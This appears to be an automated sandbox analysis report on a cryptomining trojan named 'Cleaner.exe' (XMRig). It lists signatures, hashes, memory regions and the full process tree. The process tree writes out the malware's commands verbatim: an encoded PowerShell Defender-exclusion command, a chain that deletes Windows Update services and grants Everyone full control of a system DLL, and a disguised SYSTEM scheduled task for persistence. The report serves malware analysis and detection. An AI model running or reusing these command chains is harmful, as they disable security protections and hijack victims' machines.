Analysis
-
max time kernel
149s -
max time network
147s -
platform
windows7_x64 -
resource
win7-20220414-en -
submitted
06-05-2022 09:42
General
-
Target
Cleaner.exe
-
Size
2.5MB
-
MD5
dbd1ed5d49db4a7042a7972e31e062bc
-
SHA1
f792cf6a1ed7f4ed8eebce2c09416f9d8764fe30
-
SHA256
f691787d560b58a0b92c6aa24732112cf0a8f57dd813aa1f3101d0fa73925be6
-
SHA512
6e72f161108640fbe9ef312131f6ca443c78167b5db39e34f63c89bc77771205f8c25f145684db38c36569de9b1f524ab69c1161636d0bbd6cc098e2c4a35cb8
Score
10/10
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner Payload 12 IoCs
-
Executes dropped EXE 1 IoCs
-
Possible privilege escalation attempt 4 IoCs
-
Stops running service(s) 3 TTPs
-
Loads dropped DLL 1 IoCs
-
Modifies file permissions 1 TTPs 4 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 2 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 9 IoCs
-
Modifies registry key 1 TTPs 18 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 15 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\Cleaner.exe"C:\Users\Admin\AppData\Local\Temp\Cleaner.exe"1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc3⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc3⤵
-
C:\Windows\system32\sc.exesc stop wuauserv3⤵
-
C:\Windows\system32\sc.exesc stop bits3⤵
-
C:\Windows\system32\sc.exesc stop dosvc3⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f3⤵
- Modifies security service
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f3⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f3⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE3⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Windows\Chrome\updater.exe^"'2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Windows\Chrome\updater.exe"'3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\system32\schtasks.exeschtasks /run /tn "GoogleUpdateTaskMachineQC"3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {5FC22BF7-ABC5-449C-A0E8-BC184B304902} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
-
C:\Program Files\Windows\Chrome\updater.exe"C:\Program Files\Windows\Chrome\updater.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -EncodedCommand "PAAjAHQAdgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG8AYQBrACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAYgAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwB4AGgAIwA+AA=="4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE3⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
-
C:\Windows\system32\sc.exesc stop bits4⤵
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f4⤵
- Modifies registry key
-
C:\Windows\system32\takeown.exetakeown /f C:\Windows\System32\WaaSMedicSvc.dll4⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\icacls.exeicacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q4⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\reg.exereg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f4⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE4⤵
-
C:\Windows\system32\schtasks.exeSCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" cmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe3⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "bxdoetcpshjfuf"4⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe ipwwwbzjbtvl0 Xji3FXYfqqI2timPThbgZueMNpSES88mLhMz2ywydJRha9S4YJkR8/KlqFio/vzAY7y//ZROYnArPXLiffwPB3Z0FRZu0jBByBu61ctc+oB1na2mPvSctdAZCvNSYjqxuJ9+jZO2dBGcTtltqRtfB5sis29FE8AguH8o6CZd6bm8mas+6c1fRdZPMGtCQH2foW0NS1AUT64wsPENhqV4uTo0H/V5F/ASYeMREvsY+0umqotx4ONlP8ddGQYatgAh6kK7OYcy646QnMfXYGVEjpW+rm4KbLNA0oQR2zL3uL73HuGKdXDaM+ZOVVhwrvHxPnKpXibEYXHzBnCVZQwdhVpfWnLbs/zpsVDxKUAqx2AYAKpSwmRaoN7exiSoSwjAMUFErD4i3EvVdzd42cGRPBLuP3cJA8nDTXB7SV4ArJ7DBza4VntXzsWBd6f5UJM2sV72i2/4PMabZk06BK764bA8NFT6PPwvonyyfWrLK/h9MPtBLjR4r9InJFrl+aIU0vaHtF5KlffAHx7zzO89LuQ7qoo+VAz2AYWXRKicHiTNI9eIJ43i4JzuvrxcpN9aN0p7L6b6CwRGtnOoOcIkeTBIR9gNQRxGa1PokHJa0uFlz1sPqCPJ7ZwjnOLC+l4MAmzMNN7nHGfmv+43lgAe66mEibuHRgn/byQM3aub6rWVhs3I0zo+uZl7tiiX2bo2D0L1ocES7XvKByIzK7hF3VP54li9B+b6r8JWY5Y/Ywmpmu44q4pNkIhUv658nxZetBNU/Rz8ETwJbvX4OmVqMkT7eXoNtIE4AHv9ysX/6NSaKnx0bZOxSdwvNwNkVseq/IXEEInY0TSjB+5Mhc/qCFtZ7DjO7FD6+RT9QjWoqKRjFQBusBa2T4hS3OqNFbbhkl4dy54I6qQj+WGzE0SdAKYAg8U7a659fcRzKv0HQxTjL5yDCgAGS9O9GhhYfEkEosOBCyaAI57IqENOeZzgIfDs4fmfxjzgEEcvuNSEd3ijh2izg0zLuoOBkko0Dhv9uSD16XFU9LV+iPYWc5HxPTLHJuc9Art+qBlWOVrMohoXn4h2Y/h4lPOjIVpRX0p8J9quZyqwqSE6rrb0n/p8DpTig8Qq72EkFOJclvRm5xsAMLS2XukLqnkhAsnjmrg+/KRHUfwfyrJjC3DImT7au05eMOA/UexcdajdgiMzQViTljMKaZl/sb2KKzf0ynfPk5ZBW/SZhLWVrJKA4QxsvgFY8y1t3VPOC853hTpMN1IwGMh/4YYUzBkGPEk3nbDrqHoEoh/J+JC3Et4H6kZFKsTwTx1qEd3AC3uLGoeXeUWVDoa8oKXKoRq0UqV8I2Lncic5A4p4TTCK+CT9fEpli+4ADKRSNwFnCnH9Pxctof7tqJHDlJJAJmmM6sicPU5OUxYh5XhZ5NWKxAx1fS+i9kzy/HyZ5bIi8OTg2kYvT+fBPa3tlKvWKL0+Zx2NHePChjIX0kYyuflXPMH2dIEC+5KW1KDcHJwoYEQ6V7UH6LWGJYk6LKR7T6rN+hYyp8z3ly13GhAUIMT4HNg4Lc/fZg==3⤵
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Windows\Chrome\updater.exeFilesize
2.5MB
MD5dbd1ed5d49db4a7042a7972e31e062bc
SHA1f792cf6a1ed7f4ed8eebce2c09416f9d8764fe30
SHA256f691787d560b58a0b92c6aa24732112cf0a8f57dd813aa1f3101d0fa73925be6
SHA5126e72f161108640fbe9ef312131f6ca443c78167b5db39e34f63c89bc77771205f8c25f145684db38c36569de9b1f524ab69c1161636d0bbd6cc098e2c4a35cb8
-
C:\Program Files\Windows\Chrome\updater.exeFilesize
2.5MB
MD5dbd1ed5d49db4a7042a7972e31e062bc
SHA1f792cf6a1ed7f4ed8eebce2c09416f9d8764fe30
SHA256f691787d560b58a0b92c6aa24732112cf0a8f57dd813aa1f3101d0fa73925be6
SHA5126e72f161108640fbe9ef312131f6ca443c78167b5db39e34f63c89bc77771205f8c25f145684db38c36569de9b1f524ab69c1161636d0bbd6cc098e2c4a35cb8
-
\Program Files\Windows\Chrome\updater.exeFilesize
2.5MB
MD5dbd1ed5d49db4a7042a7972e31e062bc
SHA1f792cf6a1ed7f4ed8eebce2c09416f9d8764fe30
SHA256f691787d560b58a0b92c6aa24732112cf0a8f57dd813aa1f3101d0fa73925be6
SHA5126e72f161108640fbe9ef312131f6ca443c78167b5db39e34f63c89bc77771205f8c25f145684db38c36569de9b1f524ab69c1161636d0bbd6cc098e2c4a35cb8
-
memory/300-78-0x0000000000000000-mapping.dmp
-
memory/320-130-0x0000000000000000-mapping.dmp
-
memory/360-87-0x0000000000000000-mapping.dmp
-
memory/368-138-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/368-145-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/368-142-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/368-141-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/368-137-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/368-139-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/368-143-0x0000000000400000-0x000000000040C000-memory.dmpFilesize
48KB
-
memory/564-56-0x0000000000000000-mapping.dmp
-
memory/568-126-0x0000000000000000-mapping.dmp
-
memory/824-68-0x0000000000000000-mapping.dmp
-
memory/828-66-0x0000000000000000-mapping.dmp
-
memory/932-83-0x0000000000000000-mapping.dmp
-
memory/932-112-0x0000000000000000-mapping.dmp
-
memory/984-86-0x0000000000000000-mapping.dmp
-
memory/992-88-0x0000000000000000-mapping.dmp
-
memory/1028-114-0x0000000000000000-mapping.dmp
-
memory/1044-127-0x0000000000000000-mapping.dmp
-
memory/1076-75-0x0000000000000000-mapping.dmp
-
memory/1240-124-0x0000000000000000-mapping.dmp
-
memory/1252-94-0x0000000000000000-mapping.dmp
-
memory/1280-60-0x000007FEEE130000-0x000007FEEEC8D000-memory.dmpFilesize
11.4MB
-
memory/1280-62-0x00000000024AB000-0x00000000024CA000-memory.dmpFilesize
124KB
-
memory/1280-61-0x00000000024A4000-0x00000000024A7000-memory.dmpFilesize
12KB
-
memory/1280-57-0x0000000000000000-mapping.dmp
-
memory/1304-111-0x0000000000000000-mapping.dmp
-
memory/1304-80-0x0000000000000000-mapping.dmp
-
memory/1320-73-0x0000000000000000-mapping.dmp
-
memory/1364-125-0x0000000000000000-mapping.dmp
-
memory/1364-81-0x0000000000000000-mapping.dmp
-
memory/1376-70-0x0000000000000000-mapping.dmp
-
memory/1444-95-0x0000000000000000-mapping.dmp
-
memory/1444-132-0x0000000000000000-mapping.dmp
-
memory/1472-113-0x0000000000000000-mapping.dmp
-
memory/1504-115-0x0000000000000000-mapping.dmp
-
memory/1528-90-0x0000000000000000-mapping.dmp
-
memory/1528-118-0x0000000000000000-mapping.dmp
-
memory/1536-116-0x0000000000000000-mapping.dmp
-
memory/1548-89-0x0000000000000000-mapping.dmp
-
memory/1548-117-0x0000000000000000-mapping.dmp
-
memory/1560-71-0x0000000000000000-mapping.dmp
-
memory/1576-133-0x0000000000000000-mapping.dmp
-
memory/1580-129-0x0000000000000000-mapping.dmp
-
memory/1604-84-0x0000000000000000-mapping.dmp
-
memory/1632-171-0x00000000002C0000-0x00000000002C6000-memory.dmpFilesize
24KB
-
memory/1632-146-0x00000000000A0000-0x00000000000A7000-memory.dmpFilesize
28KB
-
memory/1652-110-0x0000000000000000-mapping.dmp
-
memory/1664-82-0x0000000000000000-mapping.dmp
-
memory/1672-54-0x0000000001290000-0x0000000001516000-memory.dmpFilesize
2.5MB
-
memory/1672-131-0x0000000000000000-mapping.dmp
-
memory/1672-55-0x000007FEFBED1000-0x000007FEFBED3000-memory.dmpFilesize
8KB
-
memory/1692-72-0x0000000000000000-mapping.dmp
-
memory/1720-64-0x0000000000000000-mapping.dmp
-
memory/1724-65-0x0000000000000000-mapping.dmp
-
memory/1728-122-0x0000000000000000-mapping.dmp
-
memory/1768-67-0x0000000000000000-mapping.dmp
-
memory/1772-108-0x00000000009EB000-0x0000000000A0A000-memory.dmpFilesize
124KB
-
memory/1772-103-0x0000000000000000-mapping.dmp
-
memory/1772-74-0x0000000000000000-mapping.dmp
-
memory/1772-107-0x00000000009E4000-0x00000000009E7000-memory.dmpFilesize
12KB
-
memory/1772-106-0x000007FEED250000-0x000007FEEDDAD000-memory.dmpFilesize
11.4MB
-
memory/1780-123-0x0000000000000000-mapping.dmp
-
memory/1788-128-0x0000000000000000-mapping.dmp
-
memory/1800-79-0x0000000000000000-mapping.dmp
-
memory/1800-109-0x0000000000000000-mapping.dmp
-
memory/1840-100-0x0000000000D30000-0x0000000000FB6000-memory.dmpFilesize
2.5MB
-
memory/1840-97-0x0000000000000000-mapping.dmp
-
memory/1840-135-0x000000001AE60000-0x000000001B0AC000-memory.dmpFilesize
2.3MB
-
memory/1840-136-0x00000000008E0000-0x00000000008E6000-memory.dmpFilesize
24KB
-
memory/1848-85-0x0000000000000000-mapping.dmp
-
memory/1852-76-0x0000000000000000-mapping.dmp
-
memory/1928-121-0x0000000000000000-mapping.dmp
-
memory/1944-102-0x0000000000000000-mapping.dmp
-
memory/1972-69-0x0000000000000000-mapping.dmp
-
memory/1980-134-0x0000000000000000-mapping.dmp
-
memory/2008-63-0x0000000000000000-mapping.dmp
-
memory/2012-92-0x0000000000000000-mapping.dmp
-
memory/2012-120-0x0000000000000000-mapping.dmp
-
memory/2016-77-0x0000000000000000-mapping.dmp
-
memory/2024-91-0x0000000000000000-mapping.dmp
-
memory/2024-119-0x0000000000000000-mapping.dmp
-
memory/2028-164-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-160-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-150-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-154-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-152-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-156-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-147-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-163-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-162-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-148-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-158-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-157-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-166-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-168-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-169-0x0000000140000000-0x0000000140803000-memory.dmpFilesize
8.0MB
-
memory/2028-170-0x0000000000070000-0x0000000000090000-memory.dmpFilesize
128KB
-
memory/2036-93-0x0000000000000000-mapping.dmp